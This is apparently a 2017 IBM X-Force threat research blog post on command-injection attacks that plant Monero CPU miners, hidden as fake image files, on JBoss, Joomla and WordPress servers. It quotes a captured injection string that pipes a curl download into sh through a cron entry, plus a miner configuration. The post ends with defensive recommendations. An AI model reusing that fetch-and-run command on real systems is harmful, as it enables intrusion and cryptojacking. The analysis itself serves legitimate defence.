Network Attacks Containing Cryptocurrency CPU Mining Tools Grow Sixfold

Since we last reported on a version of the ELF Linux/Mirai malware containing cryptocurrency coin-mining tools in April, the IBM X-Force has noticed a steep increase in the volume of coin central processing unit (CPU) mining tools used in cyberattacks, specifically those targeting enterprise networks.

According to IBM Managed Security Services (MSS) data, there have been peaks reaching more than a sixfold increase in attacks involving embedded mining tools in the eight-month period between January and August 2017. This is not surprising, since a recent third-party report noted that detections for cryptocurrency mining Trojans has risen significantly in the last few years.

How CPU Mining Works

All of the attacks analyzed by IBM X-Force during that period involved the same mining tool with the capability to mine several different coins. These tools were hidden within fake image files, a technique known as steganography, hosted on compromised web servers running Joomla or WordPress, or stored on compromised JBoss Application Servers.

In most cases, the attackers attempted to mine CryptoNote-based currencies such as Monero (XMR), which employs the CryptoNight mining algorithm.

Command injection (CMDi) attacks, detected by IBM Security’s managed intrusion detection and prevention system (IDPS) service, attempted to plant the malicious images on victims’ machines using WGET and CURL shell commands when victims simply visited the page via a link in an email or through a compromised site.

Since MSS data only showed the results of the attack in the form of a request for a known malicious file, our researchers noted at least two possible scenarios:

  1. The attackers scanned for content management systems (CMS) that had already been compromised and then conducted the CMDi attack.
  2. The attackers performed both the initial compromise of the web resource and the subsequent CMDi attack.

A review of industries targeted revealed that manufacturing and financial services, both at 29 percent, tied for the industry experiencing the highest volume of these types of attacks. Other industries that have been targeted include arts and entertainment, information and communication technology, and retail.

Distribution of volume of attacks across affected industries. Source: IBM Managed Security Services data (January 2017 – August 2017).

Figure 1: Distribution of volume of attacks across affected industries (Source: IBM Managed Security Services data, January 2017 to August 2017).

The reason why certain industries were targeted over others is not easily explained. Although we have not identified any specific tools being used to scan for weaknesses in these platforms, we understand that it is a prerequisite in the exploitation of this attack type. Attackers are likely targeting industries with the most vulnerable targets versus those that offer some type of advantage in terms of mining virtual currency.

Getting Technical on Attack Details

Let’s take a look at the contents of one of the malicious file images delivering a coin miner, how the mining tools are hidden and what it looks like when they are launched. For this example, we’ll focus on an attack targeting a JBoss application server.

Attack Context:

URL=/jexws4/jexws4.jsp,arg=ppp=echo+%22%2A%2F33+%2A+%2A+%2A+%2A+curl+http://xx.xxx.xx.xxx/themes/logo.jpg|sh

The URL path above indicates a JavaScript file that is not native to JBoss software: jexws4.jsp is a component of the JexBoss exploit tool. JexBoss is a tool for testing and exploiting Java deserialization vulnerabilities in JBoss application servers. If JexBoss is resident on the target machine, it would indicate that the server is compromised and will allow shell commands to be executed.

The context shows a CURL command issued with a URL to an image file, which is then sent to the shell interpreter. Upon further examination, the image file contains shell code and is not really an image file at all. The shell code instructs the victim host to download:

  • A customized version of the legitimate mining tool Minerd;
  • A Linux-based version renamed as kworker; and
  • A configuration file to work with the mining tool called kworker.conf.
The kworker.conf file contents show a mining pool server that, in this case, resolved to pool.minexmr.com. This is a legitimate site that specifically mines the cryptocurrency Monero. The miner accesses this site with the username, password and algorithm necessary to complete the connection. Finally, the attacker added an instruction to force the process to run quietly in the background:

“url” : “stratum+tcp://xx.xxx.xx.xxx:80”,

“user” : “46XG1vfKxfE1yQnPkrwdQoUDdewkqxCz8ZUnjtu4HH6j27uaWdXaC8D43Vax6XVZmGb3MTHaULEBoiBo7DbP3PPJLyffUcF”,

“pass” : “x”,

“algo” : “cryptonight”,

“quiet” : true

When we executed this mining tool in our lab, it connected to the aforementioned site and began mining Monero using the CryptoNight algorithm, which is the one used by the CryptoNote-based group of currencies:

figure 4
Figure 2: Execution of disguised mining tool (Source: IBM Security)

To do the testing, our research lab set up an x86 machine with an Intel i5-6500 4 core processor running an Ubuntu server. At a hash rate of 46.69 H/s (hashes per second), this miner would make approximately $2.35 per month. Since organic infections would have every infected machine run its own rate of mining, it is difficult to speculate the profit of a botnet of, say, 10,000 hosts.

Our findings did show the potential for Monero to be slightly more profitable than mining for the more popular bitcoin (BTC), for example, making it perhaps more attractive to attackers. This may be the reason for the jump in volume of attacks utilizing this type of mining tool.

Other CryptoNote-based virtual currencies include:

  • ByteCoin (BCN);
  • Boolberry (BBR);
  • Dashcoin (DSH);
  • DigitalNote (XDN);
  • DarkNetCoin (DNC);
  • Fantomcoin (FCN);
  • Monero (XMR);
  • Pebblecoin (XPB);
  • Quazarcoin (QCN); and
  • Anonymous Electronic On-line Coin (AEON).

All of these cryptocurrencies are also found in the Mirai mining tool, mined along with bitcoin.

What’s the Attraction to CPU Miners?

Many virtual coin miners have been built to leverage the graphics processing unit (GPU) in infected endpoints, better known as the computer’s video card, not CPUs. This is because GPUs have large numbers of arithmetic logic units (ALUs) compared to central processing units (CPUs). This allows them to do large amounts of bulky mathematical labor in a greater quantity than CPUs.

Since they are the more powerful math problem solvers and alternative virtual currency is becoming much more popular among miners, there has been an extremely large demand for high-end GPU cards recently. This has even resulted in a global shortage of high-end GPUs, especially of those focused on mining.

If GPU mining tools offer relatively greater mining power than CPU mining tools, then what would be an attacker’s attraction to CPU miners? Let’s ponder a few possibilities.

Number of Potential Targets

Attackers can’t count on everyone running GPUs. They realize there is a large number of potential targets that are not utilizing GPUs. Most mainstream computers use integrated graphics processors (IGP), which consume less power and are much cheaper. However, they are much slower than GPUs. IGPs are built into the computer motherboard, whereas GPUs are optional add-on hardware that have much higher power requirements.

Potential Profitability

The playing field is larger and there are more endpoints to enslave. The CryptoNight mining algorithm employed by CryptoNote-based currency is designed for mining on CPUs and can be efficiently tasked to billions of existing devices (any modern x86 CPU). However, a new mining tool called Claymore’s Cryptonight GPU Miner was developed to leverage both GPUs and CPUs.

Smart Mining

A capability known as smart mining permits transparent CPU mining on the user’s computer without centralization of mining farms and pool mining, which is more in line with Satoshi Nakamoto’s original vision of a true peer-to-peer (P2P) currency. Smart mining is currently available for all flavors of mining tools across all operating systems.

Going After IoT Versus x86 Targets

At first glance, Internet of Things (IoT) devices appear to be prime targets for mining because a vast majority of them are deployed with default settings, making them easy picking for compromise. However, their minimal computing power makes them less than ideal for mining bitcoin, even with a 1 million-device botnet. Profitability potentially increases when mining CryptoNote-based currency, but that choice still wouldn’t be as profitable as using server-based targets.

Server-based targets have a wider range of power — certainly much more than the plethora of IoT devices that typically come with very little computing power. We may soon see a worm designed to mass-infect computers ranging from enterprise-level servers right down to the one from which you’re reading this blog to mine coins. On monitored devices, such activity would typically affect the endpoint’s performance and may be detected and shut down promptly after mining commences.

Shutting the Door on the Virtual Mint

Although this analysis focused specifically on a Linux variant, keep in mind that there are plenty of other flavors of mining tools for Windows, Android and Apple products such as home routers and other connected devices. Virtually any attack vector that involves injecting executable code could turn a targeted system into a virtual coin miner for the attacker. The most common methods of attack include:

  • Cross-site scripting;
  • Brute-force and default password logins/attacks;
  • Command buffer overflow exploits;
  • Hypertext preprocessor (PHP) arbitrary code injection; and
  • Command injection (including SQL injection).

One of the most successful methods of infiltration that we see is the failure to validate input fields on web applications. It is surprising to see how many times we have detected SQLi and CMDi commands actually being injected via a simple search box or URL fields.

To shut down the virtual mint trying to form on the infrastructure you protect, applying standard security precautions is the top priority. Security professionals should take the following steps:

  • Ensure timely patch management to address vulnerabilities across the entire infrastructure.
  • Change the default security credentials to prevent unauthorized access.
  • Consider using application whitelists to prevent unknown executables from launching on systems within the organizational networks.
  • Perform input validation on internet-facing web applications to mitigate injection attacks.
  • Cultivate a security-aware workforce through education and role-based training.

Creating a one-stop shopping solution for preventing miners from being executed in your environment is almost impossible because so many variables exist. Focus on your network specifics and take every precaution to identify and lock down the applicable entry points of malware and miners alike.

Read the X-Force research report: Weaponizing the Internet of Things

Share this Article:
Dave McMillen

Senior Threat Researcher, IBM Managed Security Services

Dave brings over 25 years of network security knowledge to IBM. Dave began his career in IBM over 15 years ago where he was part of a core team of six IBMers that created the IBM Emergency Response Service which eventually grew and evolved into Internet Security Systems. As an industry-recognized security expert and thought leader, Dave's background in security is full featured. Dave thrives on identifying threats and developing methods to solve complex problems. His specialties are intrusion detection/prevention, ethical hacking, forensics and analysis of malware and advanced threats. As a member of the IBM MSS Threat Research Team, Dave takes the intelligence he has gathered and turns out immediate tangible remedies that can be implemented within a customer’s network or on IBM MSS's own proprietary detection engines. Dave became interested in security back in the late 1980's and owned and operated a company that provided penetration and vulnerability testing service, one of the first of its kind. As the internet's footprint began to grow, it became clear to him there was a new problem on the horizon; protecting data. Dave worked with WheelGroup (later acquired by Cisco) where he helped develop NetRanger IDS and NetSonar. Dave also assisted with development of the very first IBM intrusion detection system, BillyGoat. Dave also has developed several other security based methods and systems which were patented for IBM.